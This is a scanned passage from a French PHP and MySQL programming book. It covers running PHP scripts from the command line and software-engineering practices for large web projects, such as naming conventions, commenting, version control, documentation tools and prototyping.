mes sont generalement ecrits dans un langage de script shell ou en Perl. Si vous 
travaillez sur un systeme Windows, ils sont generalement ecrits sous la forme d'un 
fichier batch. 

II est probable que vous ayez decouvert PHP a 1' occasion d'un projet web, mais ses 
facilites de traitement du texte qui en font un langage web robuste en font egalement 
un langage de programmation efficace pour ecrire des utilitaires en ligne de 
commande. 

II existe trois moyens d'executer un script PHP en ligne de commande : a partir d'un 
fichier, via un pipeline ou directement en ligne de commande. 

Pour executer un script PHP dans un fichier, assurez-vous que l'executable PHP (php ou 
php.exe selon votre systeme d' exploitation) se trouve dans votre path et appelez-le 
avec le nom du script en parametre. Voici un exemple : 

php monscript . php 

Le fichier monscript.php est un simple fichier PHP contenant des elements de syntaxe 
PHP normaux dans des balises PHP. 
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Pour faire passer le code via un pipeline, vous pouvez executer n'importe quel programme 
qui produit un script PHP valide en sortie et injecter sa sortie vers l'executable php. 
L'exemple suivant utilise la commande echo pour produire un programme en ligne : 

echo '<?php for($i=1; $i<10; $i++) echo $i; ?> 1 | php 

La aussi, le code PHP est entoure par des balises PHP (<?php et ?>). Notez en outre 
qu'il s'agit de la commande echo du systeme d'exploitation, pas de l'instruction de 
PHP. 

Un programme en ligne de cette nature serait en realite plus simple a passer directement 
depuis la ligne de commande, comme dans l'exemple suivant : 

php -r 'for($i=1; $i<10; $i++) echo $i; ' 
La situation est ici legerement differente. Le code PHP passe dans cette chame n'est pas 
entoure par des balises PHP Si vous entourez la chaine avec des balises PHP, vous 
obtiendrez une erreur de syntaxe. 

II existe des possibilites illimitees pour ecrire des programmes PHP utiles en ligne de 
commande. Vous pouvez creer des installateurs pour vos applications PHP ou ecrire un 
script permettant de reformater un fichier texte avant de l'importer dans votre base de 
donnees. Vous pouvez meme creer un script permettant de realiser a partir de la ligne 
de commande n'importe quelle tache repetitive dont vous avez besoin, par exemple 
pour copier tous vos fichiers PHP, toutes vos images et toutes vos structures de table de 
votre serveur web de test vers votre serveur de production. 

Pour la suite 

La cinquieme partie de cet ouvrage est consacree a divers projets relativement complexes 
faisant intervenir PHP et MySQL. Ces projets vous fourniront des exemples precieux 
pour vos propres projets lorsque vous devrez implementer des taches similaires. lis 
montrent comment tirer parti de PHP et de MySQL dans des projets d'envergure. 

Le Chapitre 23 presente quelques-uns des problemes couramment rencontres lors du 
codage de gros projets en PHP. II expose d'importants principes de genie logiciel 
concernant la conception, la documentation et la gestion des modifications. 
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Utilisation de PHP et de MySQL dans des projets 
importants 

Debogage 

Authentification des utilisateurs et personnalisation 
Implementation d'un panier virtuel 
Implementation d'un webmail 

Implementation d'un gestionnaire de listes de diffusion 
Implementation d'un forum web 
Production de documents personnalises en PDF 
Connexion a des services web avec XML et SOAP 
Construction d' applications web 2.0 avec Ajax 
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Utilisation de PHP et de MySQL 
dans des projets importants 

Dans les precedentes parties de ce livre, nous avons presente les differents composants 
et utilisations de PHP et de MySQL. Bien que nous ayons tente de rendre tous nos 
exemples aussi interessants et pertinents que possible, ils sont restes assez simples car 
ils n'etaient composes que de un ou deux scripts et ne depassaient pas une centaine de 
lignes de code. 

Lorsque Ton construit de vraies applications web, les choses sont rarement aussi 
simples. II y a quelques annees, les sites web "interactifs" ne contenaient qu'un simple 
formulaire d' e-mail. De nos jours, ces sites sont devenus des applications web a part 
entiere, c'est-a-dire des logiciels transmis par le Web. Ce changement de point de vue 
s'accompagne d'un changement d'echelle : les sites sont passes d'une poignee de 
scripts a des milliers et des milliers de lignes de code. Des projets de cette ampleur 
necessitent done desormais un planning et une gestion comparables a ceux des autres 
developpements de logiciels. 

Avant de passer aux projets presentes dans cette section du livre, nous devons aborder 
quelques techniques dont vous pourrez tirer profit pour gerer des projets web impor- 
tants. Ce nouveau domaine est en plein developpement et il est naturellement assez 
difficile a cerner : pour s'en convaincre, il suffit d' observer le marche actuel. 

Appliquer les regies du genie logiciel au developpement web 

Vous le savez probablement deja, le genie logiciel consiste a appliquer une approche 
quantifiable et systematique au developpement des logiciels. Autrement dit, il s'agit de 
soumettre le developpement logiciel aux principes de l'ingenierie. 
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Cette approche brille generalement par son absence dans la plupart des projets web et 
cela pour deux raisons principales. La premiere est que le developpement web est souvent 
aborde de la meme maniere que le developpement de rapports ecrits, c'est-a-dire 
comme un exercice portant sur la structure des documents, la conception graphique et 
la production. Cette approche "orientee document" est tout a fait adaptee pour des sites 
statiques de taille moyenne, mais elle ne Test plus pour les sites qui fournissent de plus 
en plus de contenu dynamique et qui proposent done desormais des services plutot que 
des documents. En outre, certaines personnes pensent qu'il n'est pas reellement neces- 
saire d'appliquer les techniques du genie logiciel pour des projets web. 

La seconde raison pour laquelle les techniques du genie logiciel ne sont pas utilisees est 
que le developpement d' applications web est different du developpement d' applica- 
tions classiques, pour plusieurs raisons. Les temps de developpement sont beaucoup 
plus courts, a cause d'une pression permanente pour construire le site immediatement. 
Par opposition, le developpement des logiciels classiques est generalement planifie. 
Avec les projets web, on a souvent l'impression de n'avoir meme pas le temps d'etablir 
un planning. 

Lorsqu'un projet web n'est pas planifie, on se retrouve avec les memes problemes 
qu'avec un projet logiciel classique non planifie : des applications contenant des 
erreurs, des delais de livraison non respectes et du code illisible. 

Toute l'astuce consiste done a identifier les parties du genie logiciel qui sont compati- 
bles avec le developpement d' applications web et a supprimer celles qui ne le sont pas. 

Planification et mise en ceuvre d'un projet d'application web 

II n'existe aucune methodologie optimale ni aucun cycle de vie ideal pour les projets 
web, mais il y a cependant un certain nombre de choses que vous pouvez faire pour 
votre projet. Nous allons les presenter tout de suite et nous y reviendrons en detail dans 
les sections suivantes. Ces considerations sont presentees dans un ordre particulier, 
mais vous n'etes pas oblige de le respecter s'il ne correspond pas a votre projet. Le plus 
important etant de connaitre ces problemes et de choisir des techniques adaptees a votre 
cas. 

■ Avant de commencer, pensez a vos objectifs. Essayez de determiner qui utilisera 
votre application web. Plusieurs sites, irreprochables sur le plan technique, n'ont 
aucun succes parce que leurs concepteurs n'ont pas pense a verifier s'ils interessaient 
les utilisateurs. 

■ Essayez de decomposer votre application en differents composants. Quelles sont les 
differentes parties de votre application ? Comment fonctionnera chacun de ces 
composants ? Comment les composants s'integreront-ils dans 1' ensemble final ? 
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Imaginez des scenarios, faites des story-boards et passez en revue les differents cas 
de figure pour essayer de preciser la structure de votre application. 

■ Apres avoir identifie une liste de composants, essayez de chercher ceux qui existent 
deja. Si un module existant possede les fonctionnalites requises, utilisez-le. 
N'oubliez pas de chercher ces modules a la fois dans votre societe et en dehors, sur 
Internet. II existe notamment dans la communaute open-source plusieurs compo- 
sants logiciels qui sont utilisables gratuitement. Essayez de determiner la quantite de 
code que vous devrez ecrire vous-meme et la quantite de travail que cela represente. 

■ Mettez sur pied une strategic pour la resolution des difncultes a surmonter dans la 
realisation. Cette partie est trop souvent ignoree dans les projets web. Cette strategic 
doit couvrir notamment les standards de programmation, la structure des repertoi- 
res, la gestion du controle des versions, l'environnement de developpement, le 
niveau de documentation et les standards, ainsi que la repartition des taches parmi 
les membres de votre equipe. 

■ Construisez un prototype a partir de toutes les informations precedentes. Presentez- 
le a des utilisateurs afin de connaitre leurs reactions et recommencez. 

a N'oubliez pas que dans tout ce processus il est important et utile de separer le 
contenu et la logique de votre application. Nous reviendrons sur ce principe un peu 
plus loin. 

■ Apportez toutes les optimisations necessaries. 

I Effectuez tous les tests necessaires, comme pour n'importe quel projet de develop- 
pement logiciel. 

Reutilisation du code 

Les programmeurs font souvent l'erreur de reecrire un code qui existe deja. Si vous 
connaissez les composants dont vous aurez besoin ou, a une echelle plus petite, les 
fonctions que vous devrez implementer, verifiez ce dont vous disposez avant de 
commencer le developpement. 

Un des points forts de PHP tient au fait que ce langage comprend une bibliotheque 
considerable de fonctions predefmies. Prenez toujours la peine de verifier qu'il n'existe 
pas une fonction realisant ce que vous cherchez a faire. Habituellement, il n'est pas trop 
difficile de la trouver. Une bonne methode consiste a parcourir le manuel par groupes de 
fonctions. 

II arrive souvent que les programmeurs ecrivent des fonctions sans chercher auparavant 
dans le manuel si une fonction analogue existe deja. Gardez toujours le manuel dans 
vos favoris. N'oubliez pas, cependant, que le manuel en ligne est frequemment mis a 
jour. Le manuel annote, notamment, est une ressource fantastique, car il contient un 
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grand nombre de commentaires, de suggestions et d'exemples de code provenant 
d'utilisateurs qui ont eu a repondre aux memes questions que vous apres avoir lu la 
page du manuel. II contient souvent des rapports de bogues et des solutions de contour- 
nement dans l'attente d'un correctif ou d'un complement de documentation. 

Vous trouverez la version francaise du manuel a l'URL http://www.php.net/manual/fr. 

Certains programmeurs qui ont l'experience d'un autre langage de programmation 
pourraient etre tentes d'ecrire des fonctions enveloppes pour renommer les fonctions de 
PHP comme les fonctions dont ils avaient l'habitude. Cette pratique est appelee sucre 
syntaxique et nous la deconseillons : le code sera plus difficile a lire et a maintenir par 
d'autres programmeurs. Si vous apprenez un nouveau langage, il faut l'apprendre inte- 
gralement. En outre, l'ajout d'un niveau supplemental d'appel de fonction ralentit le 
code. Tout bien considere, cette approche doit done etre absolument evitee. 

Si la fonctionnalite dont vous avez besoin ne se trouve pas dans la bibliotheque princi- 
pale de PHP, vous avez deux possibilites. Si votre besoin est assez simple, vous pouvez 
l'ecrire vous-meme. Cependant, s'il est assez complexe (un panier virtuel, un systeme 
de webmail, un forum web), vous vous apercevrez que quelqu'un d'autre a surement 
deja ecrit le code adequat. L'un des avantages de travailler dans la communaute open- 
source est que le code d'un grand nombre de composants est disponible gratuitement. 
Si vous trouvez un composant analogue a celui que vous souhaitez realiser, meme s'il 
n'est pas en tout point identique, vous pouvez recuperer le code source comme point de 
depart et le modifier pour construire le votre. 

Si vous etes, en fin de compte, oblige de developper vos propres fonctions, pensez a les 
rendre disponibles pour la communaute PHP. C'est ce principe qui rend la communaute 
de developpeurs PHP aussi active, serviable et performante. 

Ecrire du code facile a maintenir 

Le probleme de la maintenance est frequemment oublie dans les applications web, le 
plus souvent parce que celles-ci sont ecrites rapidement. De fait, il semble souvent plus 
important de terminer rapidement un programme que de le planifier en detail. Cepen- 
dant, un petit investissement en amont peut vous epargner beaucoup de soucis lors de 
1' denture de la version suivante de votre application. 

Standards de programmation 

La plupart des societes informatiques importantes utilisent des standards de program- 
mation, e'est-a-dire des regies pour les noms des fichiers et des variables, pour 
commenter le code, pour l'indenter, etc. 

A cause de la maniere dont le developpement web est generalement considere, ces 
conventions de programmation sont souvent negligees. Si vous programmez dans votre 
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coin, ou au sein d'une petite equipe, il est assez facile de sous-estimer 1' importance de 
ces conventions. Ne tombez pas dans ce piege, car votre equipe et votre projet seront 
probablement amenes a grandir. Dans ce cas, il faut absolument eviter de se retrouver 
avec des programmes incoherents ou avec une equipe de programmeurs incapables de 
recuperer le code existant. 

Conventions de noms 

Les objectifs d'une convention de noms sont les suivants : 

■ Rendre le code plus facile a lire. Si vous definissez les noms des variables et des 
fonctions d'une maniere coherente, vous devriez etre capable de lire votre code 
aussi simplement qu'une phrase en francais ou, au moins, aussi simplement que du 
pseudo-code. 

a Se souvenir plus facilement du nom des identificateurs. Si vos identificateurs sont 
tous formates de la meme maniere, vous aurez plus de facilite a les memoriser si 
vous avez deja appele certaines variables ou certaines fonctions. 

Les noms des variables doivent decrire les donnees qu'elles contiennent. Si vous 
enregistrez le prenom d'une personne, placez-le dans une variable appelee $prenom. 
Vous devez trouver un equilibre entre la longueur du nom des variables et leur 
lisibilite. II est par exemple plus facile de stacker un nom dans une variable appelee 
$n, mais votre code sera plus difficile a comprendre. En le stockant dans 
$prenom utilisateur courant, vous donnez plus d' informations, mais cela implique 
plus de saisie (et favorise done les erreurs) que cela en vaut la peine. 

Vous devez egalement prendre certaines decisions quant a l'utilisation des lettres 
majuscules car, comme nous l'avons deja vu, les noms des variables PHP sont sensibles 
a la casse. Vous devez done decider si vos noms de variables seront integralement en 
minuscules, en majuscules ou dans un melange des deux. On choisit generalement de 
mettre en majuscule la premiere lettre de chaque mot. Personnellement, nous avons 
tendance a utiliser des noms de variables entierement en minuscules, puisque e'est la 
convention la plus simple a se rappeler. 

II est egalement pratique d' utiliser la casse pour etablir une difference entre les varia- 
bles et les constantes. Par exemple, vous pouvez mettre les noms des variables en 
minuscules, comme $resultat, et les noms des constantes en majuscules, comme PI. 

En revanche, il faut eviter de defmir deux variables dont les noms sont identiques a la 
casse pres, comme $nom et $Nom. 

Mieux vaut egalement eviter les combinaisons minuscules/majuscules amusantes, 
comme dans $WaReZ, car personne ne sera capable de se souvenir exactement du nom 
de cette variable. 



534 Partie V 



Creer des projets avec PHP et MySQL 



II faut aussi penser a definir une strategic pour les noms de variables comprenant 
plusieurs mots. Les schemas suivants, par exemple : 

$nomutilisateur 

$nom_utilisateur 

$nomUtilisateur 

sont couramment utilises. Votre choix n'a pas d'importance particuliere, du moment 
que vous restez coherent dans tous vos programmes. Vous pouvez egalement choisir 
une limite de deux ou trois mots dans le nom des variables. 

Les noms des fonctions peuvent etre choisis de la meme maniere, a quelques exceptions 
pres. lis doivent generalement contenir un verbe. On peut prendre comme exemple 
certaines fonctions PHP comme addslashes() ou mysql connect(), qui decrivent 
clairement ce qu'elles font, ce qui ameliore grandement la lisibilite du code. Vous 
remarquerez que ces deux fonctions gerent differemment l'union de plusieurs mots. 
A cet egard, les fonctions de PHP ne sont pas coherentes, peut-etre parce qu'elles ont 
ete ecrites par plusieurs personnes, mais surtout parce que de nombreuses fonctions 
proviennent de plusieurs langages et API et que leurs noms n'ont pas ete modifies au 
cours de leur adoption. 

Rappelez-vous en outre qu'en PHP les noms des fonctions ne sont pas sensibles a la casse. 
Cependant, pour eviter la confusion, choisissez un format particulier et respectez-le. 

Vous pouvez reprendre la convention de noms des modules de PHP, qui consiste a 
placer le nom du module au debut du nom des fonctions. Ainsi, toutes les fonctions 
MySQL commencent par mysql et toutes les fonctions IMAP commencent par imap . 
Si vous possedez un module de gestion des paniers virtuels dans votre code, par exemple, 
vous pouvez faire preceder tous les noms des fonctions de ce module par panier . 

Notez cependant que, lorsque PHP 5 propose a la fois une interface procedurale et une 
interface orientee objet, les noms de fonctions sont differents. En general, les interfaces 
procedurales utilisent des blancs soulignes (ma function ()), alors que les interfaces 
orientees objet emploient une notation en casse mixte (maFonction ( )). 

En resume, les conventions et les standards que vous utiliserez pour ecrire votre code 
n'ont pas d'importance en eux-memes, du moment que vous restez coherent dans tous 
vos programmes. 

Commenter votre code 

Tous les programmes doivent etre correctement commentes. Vous etes en droit de vous 
demander a partir de quel point un programme est correctement commente mais, generale- 
ment, on considere qu'il faut ajouter un commentaire a chacun des elements suivants : 

■ Les fichiers, qu'il s'agisse de scripts entiers ou de fichiers a inclure. Chaque 
fichier doit contenir un commentaire indiquant le fichier dont il s'agit, a quoi il sert, 
qui l'a ecrit et le moment ou il a ete mis a jour. 
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■ Les fonctions. Les commentaires des fonctions doivent indiquer a quoi elles 
servent, les parametres qu'elles prennent en entree et ce qu'elles renvoient. 

■ Les classes. Les commentaires des classes doivent decrire a quoi elles servent. Les 
methodes de chaque classe doivent posseder le meme type et le meme niveau de 
commentaires que n'importe quelle autre fonction. 

a Les morceaux de code a l'interieur d'un script ou d'une fonction. II est souvent 
utile de commencer a ecrire un script par un ensemble de commentaires compara- 
bles a du pseudo-code avant d'entreprendre l'ecriture du code de chaque section. 
Le squelette initial d'un script peut ainsi ressembler a ces lignes : 

<? 

// valider les donnees d' entree 
// les envoyer a la base de donnees 
// afficher les resultats 

?> 

Ce systeme de commentaire est tres utile puisque, lorsque vous aurez termine de 
remplir les sections par des appels de fonctions ou tout autre code, votre code est 
deja commente. 

■ Le code complexe et les astuces de programmation. S'il vous a fallu une journee 
entiere pour ecrire un programme ou si vous avez du l'ecrire d'une maniere etrange, 
n'oubliez pas d'ecrire un commentaire expliquant ce que vous avez fait. De cette 
maniere, lorsque vous reprendrez le programme, vous n' aurez pas a vous demander : 
"A quoi ce code peut-il bien servir ?" 

Un autre conseil general a respecter est qu'il faut ecrire vos commentaires au fur et a 
mesure. Vous pourriez penser que vous reprendrez vos programmes pour les commen- 
ter apres la fin du projet, mais il est presque certain que vous ne le ferez jamais, a moins 
que vous ne soyez vraiment beaucoup plus discipline que nous. 

Indentations 

Comme avec n'importe quel langage de programmation, vous devez indenter votre 
code d'une maniere coherente et logique. L'ecriture d'un programme doit ressembler a 
la redaction d'un resume ou d'une lettre. L'indentation rend votre code plus simple a lire et 
plus rapide a comprendre. 

En general, un bloc de programme qui appartient a une structure de controle doit etre 
intente par rapport au code exterieur. Le niveau d' indentation doit etre perceptible 
(c'est-a-dire plusieurs espaces), sans etre excessif. D'une maniere generale, l'utilisation 
des tabulations doit etre proscrite. Bien qu'elles soient assez pratiques a saisir, elles 
prennent beaucoup de place dans la plupart des configurations. Personnellement, nous 
nous servons d'un niveau d'indentation de deux ou trois espaces pour tous nos projets. 
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La maniere de placer les accolades est elle aussi un probleme. Les deux approches les 
plus couramment utilisees sont les suivantes : 

Convention 1 : 

if (condition) { 
// action 

} 

Convention 2 : 

if (condition) 
{ 

// action 

} 

Vous etes libre de choisir celle qui vous plait le plus. Une fois encore, vous devez rester 
coherent dans tout votre projet, de maniere a eviter les confusions. 

Decomposer le code 

Un code gigantesque et monolithique est inutilisable. Certaines personnes ont tendance 
a ecrire un seul gros script qui fait tout son travail dans une seule instruction switch 
geante. II vaut mieux decomposer le code en plusieurs fonctions et/ou classes et placer 
les elements concernes dans des fichiers a inclure. Par exemple, vous pouvez placer toutes 
vos fonctions en rapport avec les bases de donnees dans un fichier appe\6fcts_bd.php. 

Parmi les raisons justifiant la decomposition du code en plusieurs elements, on peut 
citer les suivantes : 

■ Cela rend votre code plus facile a lire et a comprendre. 

■ Votre code est reutilisable plus facilement, tout en minimisant les redondances. Par 
exemple, vous pouvez reutiliser le fichier fctsjbd.php que nous venons de mention- 
ner dans chaque script qui doit se connecter a votre base de donnees. Si vous devez 
modifier votre methode d'acces a la base de donnees, il suffit de modifier ce fichier. 

■ Cela facilite le travail d'equipe. Si le code est decompose en plusieurs composants, 
vous pouvez repartir la responsabilite des differents composants entre les membres 
de votre equipe. Cela signifie egalement que vous pouvez eviter la situation dans 
laquelle un programmeur attend qu'un autre ait fini d'ecrire script _geant.php avant 
de pouvoir continuer son propre travail. 

Au debut d'un projet, il faut prendre un peu de temps pour penser a la maniere dont 
vous allez le decomposer et planifier ses differents composants. Cela necessite d'etablir 
un diagramme des differentes fonctionnalites et des relations qui existent entre elles, 
mais n'y passez pas trop de temps, puisque vous serez peut-etre amene a le modifier au 
fur et a mesure de l'avancement du projet. Vous devrez egalement choisir les composants 
a developper en premier, preciser ceux qui dependent des autres et definir un planning de 
developpement general. 
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Meme si tous les membres de votre equipe doivent travailler sur tous les composants, il 
peut etre interessant de conifer la responsabilite de chaque composant a une personne 
en particulier qui sera done responsable en cas de probleme avec son composant. II faut 
egalement qu'une personne prenne le titre de responsable de coordination du projet, 
e'est-a-dire qu'elle devra s'assurer que tous les composants suivent correctement leur 
developpement et qu'ils sont compatibles avec les autres. Generalement, cette personne 
se charge aussi du controle des versions, sur lequel nous reviendrons un peu plus loin 
dans ce chapitre. Cette personne peut etre le responsable du projet ou tout autre membre 
de 1' equipe capable d'assumer ce role. 

Utiliser une structure standard pour vos repertoires 

Au debut d'un projet, vous devez determiner la maniere dont la structure de vos compo- 
sants sera refletee par la structure des repertoires de votre site web. De meme qu'il faut 
eviter d'ecrire un enorme script contenant toutes les fonctionnalites, il vaut mieux 
eviter de creer un seul repertoire gigantesque contenant tous les fichiers. Essayez 
d'etablir une distinction entre les composants, la logique, le contenu et les bibliothe- 
ques partagees. Documentez votre structure et assurez-vous que toutes les personnes 
qui travaillent sur le projet en ont une copie afm de pouvoir trouver ce qu'elles cherchent. 

Documenter et partager les fonctions developpees en interne 

Au fur et a mesure que vous developpez des bibliotheques, distribuez-les aux autres 
programmeurs de votre equipe. Souvent, chaque programmeur d'une equipe ecrit ses 
propres fonctions de bases de donnees, de dates ou de debogage, ce qui constitue une 
perte de temps. II est done tres important de distribuer vos fonctions et vos classes aux 
autres programmeurs. 

N'oubliez pas que, meme si vos programmes sont stockes dans un repertoire partage, 
les membres de votre equipe ne vont pas systematiquement verifier les fonctions qui s'y 
trouvent, a moins que vous ne les avertissiez explicitement. Vous pouvez developper un 
systeme pour documenter les bibliotheques de fonctions developpees en interne et le 
rendre disponible aux programmeurs de votre equipe. 

Implementer un controle de versions 

Le controle de versions est 1' art de gerer les modifications concurrentes dans un deve- 
loppement logiciel. Les systemes de controle de versions servent generalement de 
depot {repository) centralise et fournissent une interface permettant d'acceder au code 
et de le partager (et, eventuellement, de le documenter). 

Imaginez une situation dans laquelle vous essayez d'ameliorer un programme mais que, 
ce faisant, vous introduisez accidentellement une erreur et n'etes pas capable de la 
re trouver pour la supprimer, ou qu'un client decide que la version precedente de votre 
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application convient mieux a son site, ou encore que vous deviez revenir a une version 
anterieure pour des considerations legales. 

Imaginez une autre situation dans laquelle deux membres de votre equipe de program- 
mation souhaitent travailler sur le meme fichier. Ces deux personnes peuvent ouvrir et 
modifier le fichier en meme temps, en ecrasant leurs modifications mutuelles, ou le 
recopier sur leur disque dur local et le modifier independamment. Si vous pensez que ce 
cas de figure peut se produire, vous ne pouvez pas forcer un programmeur a attendre 
que son collegue ait fini de modifier le fichier. 

Vous pouvez resoudre tous ces problemes grace a un systeme de controle de versions. 
Ces systemes sont capables de reperer les modifications apportees a chaque fichier, ce 
qui permet de connaitre non seulement l'etat actuel d'un fichier, mais aussi tous ses 
etats precedents. Cette caracteristique permet, en cas de probleme, de revenir a une 
version precedente qui fonctionne correctement. Comme il est generalement possible 
de marquer un ensemble de fichiers comme appartenant a une version particuliere, vous 
pouvez continuer le developpement de votre programme tout en pouvant acceder a 
n'importe quel moment a la derniere version complete du projet. 

Les systemes de controle de versions permettent egalement d' aider plusieurs program- 
meurs a travailler simultanement sur le meme code. Chaque programmeur peut obtenir 
une copie d'un fichier (on dit dans ce cas qu'il derive (check out) le fichier a partir du 
depot) et le modifier. II suffit ensuite d'integrer ces modifications dans le fichier du 
depot (on dit alors que le programmeur integre (check in ou commit) son fichier). Les 
systemes de controle de versions peuvent, par consequent, conserver une trace des 
modifications qui ont ete apportees et savoir qui a apporte chaque modification. 

Ces systemes possedent en general des mecanismes permettant de gerer les mises a jour 
concurrentes. Cela signifie que deux programmeurs peuvent modifier en meme temps le 
meme fichier. Par exemple, imaginons que Jean et Marie aient derive simultanement la 
derniere version de leur projet. Lorsque Jean a termine de modifier le fichier sur lequel 
il a travaille, il suffit de l'integrer dans le projet. Mais Marie a egalement modifie ce 
fichier et elle tente elle aussi de l'integrer. Si les modifications qu'ils ont apportees ne se 
trouvent pas dans la meme partie du fichier, le systeme de controle de versions peut 
fusionner les deux versions de ce fichier. Si ces modifications entrent en conflit, Marie 
est prevenue et le systeme affiche les deux versions differentes. II lui suffit alors de 
rectifier sa version de maniere a eviter les conflits. 

Le systeme de controle de versions utilise par la majorite des developpeurs open-source 
et/ou Unix s'appelle CVS, qui signifie Concurrent Versions System. CVS est un logiciel 
open-source fourni avec presque toutes les versions d'Unix et OS X, mais vous pouvez 
vous en procurer une version pour les PC sous DOS ou Windows. II utilise un modele 
client/serveur, afin d'etre utilise a partir d'Internet, a condition que le serveur CVS soit 
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accessible sur Internet. CVS est utilise pour le developpement des projets PHP, Apache 
et Mozilla, ainsi que pour beaucoup d'autres projets de haut niveau. 

Vous pouvez telecharger une version de CVS pour votre systeme a partir de la page 
d'accueil de CVS, sur le site http://ximbiot.com/cvs/wiki/. 

Bien que le systeme de base de CVS soit un outil en ligne de commande, il existe 
plusieurs extensions permettant d'y ajouter une interface graphique, comme une inter- 
face Windows ou Java. Vous les trouverez egalement sur la page d'accueil de CVS. 

Bitkeeper est un produit de controle de version rival utilise par quelques projets open- 
source de renom, dont MySQL et le noyau Linux. II est disponible gratuitement pour 
les projets open-source a partir de http://www.bitkeeper.com/. 

II existe egalement des alternatives commerciales, dont perforce, qui s'execute sur les 
plates-formes les plus courantes et integre la prise en charge de PHP. Bien qu'il s'agisse 
d'un produit commercial, des licences gratuites sont offertes pour des projets open- 
source sur le site http://www/perforce.com/. 

Choisir un environnement de developpement 

Apres avoir aborde les systemes de controle de versions, il est tout naturel de nous inte- 
resser aux environnements de developpement. La seule chose dont vous ayez reelle- 
ment besoin est un editeur de texte et un navigateur (pour les tests), mais les 
programmeurs sont generalement plus productifs lorsqu'ils travaillent avec un environ- 
nement de developpement, ou IDE (Integrated Development Environment). 

II existe plusieurs projets libres consacres a la realisation d'un IDE pour PHP. Citons 
notamment KPHPDevelop, qui est destine au bureau KDE sous Linux et est disponible 
sur le site http://kphpdev.sourceforge.net/. 

II n'en demeure pas moins qu'a l'heure actuelle les meilleurs IDE pour PHP sont tous 
commerciaux. Citons notamment Zend Studio, de zend.com, Komodo, d'actives- 
tate.com, et PHPEd, de nusphere.com, qui fournissent tous des IDE dotes de nombreu- 
ses fonctionnalites. Tous ces environnements sont telechargeables gratuitement pour 
une periode d'essai mais vous devrez payer pour continuer a les utiliser. Komodo 
propose une licence utilisateur a un prix tres modique pour un usage non commercial. 

Documenter vos projets 

Vous pouvez produire de nombreux types de documentations pour vos projets, parmi 
lesquels : 

■ la documentation de 1' architecture generale ; 

■ la documentation technique et le guide du developpeur ; 
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■ un dictionnaire des donnees (contenant la documentation des classes) ; 

■ le guide de l'utilisateur (bien que la plupart des applications web soient assez 
simples). 

Dans cette section, notre objectif est non pas de vous enseigner a ecrire une documen- 
tation technique, mais de vous suggerer comment vous simplifier la vie en automatisant 
une partie de ce processus. 

Dans certains langages, il est possible de generer automatiquement certains de ces 
documents, en particulier la documentation technique et les dictionnaires de donnees. 
j avadoc, par exemple, produit une arborescence de fichiers HTML contenant les proto- 
types et les descriptions des membres des classes pour des programmes Java. 

II existe plusieurs utilitaires de ce type pour PHP : 

■ phpdoc, disponible sur http://www.phpdoc.de/. 

C'est l'outil qu'utilise PEAR pour documenter son code. Notez que le terme 
phpDoc est utilise pour decrire plusieurs projets de ce type, pas simplement celui-ci. 

■ PHPDocumentor, disponible sur http://phpdocu.sourceforge.net/. 

PHPDocumentor fournit un resultat comparable a celui de j avadoc et il semble tres 
robuste. Apparemment, son equipe de developpeurs est plus active que celles des 
deux autres projets ici mentionnes. 

■ Phpautodoc, disponible sur http://sourceforge.net/projects/phpautodoc/. 

phpautodoc produit egalement un resultat comparable a celui de j avadoc. 

Pour vous procurer plus d' applications de ce genre (et des composants PHP en general), 
vous pouvez consulter le site de SourceForge, http://sourceforge.net/. SourceForge est 
surtout utilise par la communaute Unix/Linux, mais vous y trouverez egalement de 
nombreux projets fonctionnant sur d' autres plates-formes. 

Prototypage 

Le prototypage est le cycle de vie que Ton utilise souvent pour le developpement des 
applications web. Un prototype est un outil tres efficace pour se conformer aux deman- 
des des clients. II s'agit generalement d'une version simplifiee d'une application qui 
peut servir de base pour une discussion avec un client et qui sert de support pour 1' appli- 
cation finale. II faut souvent passer par plusieurs prototypes avant d'obtenir 1' application 
finale. Lavantage de cette approche est qu'elle vous permet de travailler en relation 
etroite avec le client, afin de produire un systeme dont le client sera entierement satisfait 
et qu'il maitrisera parfaitement. 
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Pour pouvoir mettre rapidement en place un prototype, vous avez besoin de certaines 
connaissances et de certains outils. C'est dans cette situation qu'une approche par 
composants se revele utile. Si vous disposez d'un ensemble de composants qui existent 
deja, en interne ou sur Internet, vous serez capable de developper beaucoup plus rapide- 
ment vos prototypes. Les templates sont un autre outil interessant pour un developpement 
rapide de prototypes. Nous y reviendrons dans la prochaine section. 

Cependant, 1' utilisation des prototypes peut poser essentiellement deux problemes, que 
vous devez connaitre pour tirer le meilleur profit de cette approche. 

Tout d'abord, les programmeurs ont souvent du mal a jeter a la poubelle un code qu'ils 
ont ecrit, pour une raison ou pour une autre. Les prototypes etant souvent ecrits tres 
rapidement, au gre de 1' inspiration, on se rend souvent compte apres coup qu'un proto- 
type n'est pas optimal, voire pire. Les sections inadequates du code peuvent etre corri- 
gees mais, si la structure generale n'est pas bonne, vous aurez de serieux problemes. En 
fait, les applications web sont souvent developpees avec d'enormes contraintes de 
delais et il se peut que vous n'ayez pas le temps de les corriger. Vous pouvez done vous 
retrouver avec un systeme dont 1' architecture n'est pas tres adaptee et est difficile a 
maintenir. 

Pour eviter ce probleme, il suffit de mettre en place un planning, comme nous l'avons 
deja vu dans ce chapitre. En outre, n'oubliez pas qu'il est parfois plus facile de repartir 
de zero que d'essayer de corriger une version completement erronee. Meme si vous 
pensez que vous n'en avez pas le temps, cette approche vous epargnera bien des soucis 
par la suite. 

Le second probleme des prototypes est que votre systeme peut ne jamais sortir de sa 
phase de prototypage. A chaque fois que vous pensez avoir fini, votre client peut vous 
suggerer plusieurs ameliorations, de nouvelles fonctionnalites ou des mises a jour du 
site. Ce piege peut vous empecher de finir un jour votre projet. 

Pour eviter ce probleme, etablissez un plan de projet avec un nombre limite d'iterations 
et fixez une date apres laquelle aucune fonctionnalite ne pourra plus etre ajoutee sans 
modification du planning, du budget et du calendrier. 

Separation de la logique et du contenu 

Vous avez probablement l'habitude d'utiliser HTML pour decrire la structure d'un 
document web et des CSS {Cascading Style Sheets) pour decrire son apparence. L'idee 
de separer la presentation et le contenu peut etre etendue aux scripts. En general, les 
sites sont plus faciles a utiliser et a maintenir sur un long terme si vous etes capable de 
separer la logique du contenu de votre presentation. Cela revient a separer votre code 
PHP et votre code HTML. 
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Pour les petits projets ne contenant que quelques lignes de code, cette approche n'est 
probablement pas justifiee mais, lorsque vos projets deviendront plus importants, il sera 
essentiel de trouver une maniere de separer la logique et le contenu. Dans le cas 
contraire, votre code sera de plus en plus difficile a maintenir. Si vous decidez de changer 
1' architecture de votre site et si votre code integre beaucoup de HTML, la modification de 
1' architecture tournera au cauchemar. 

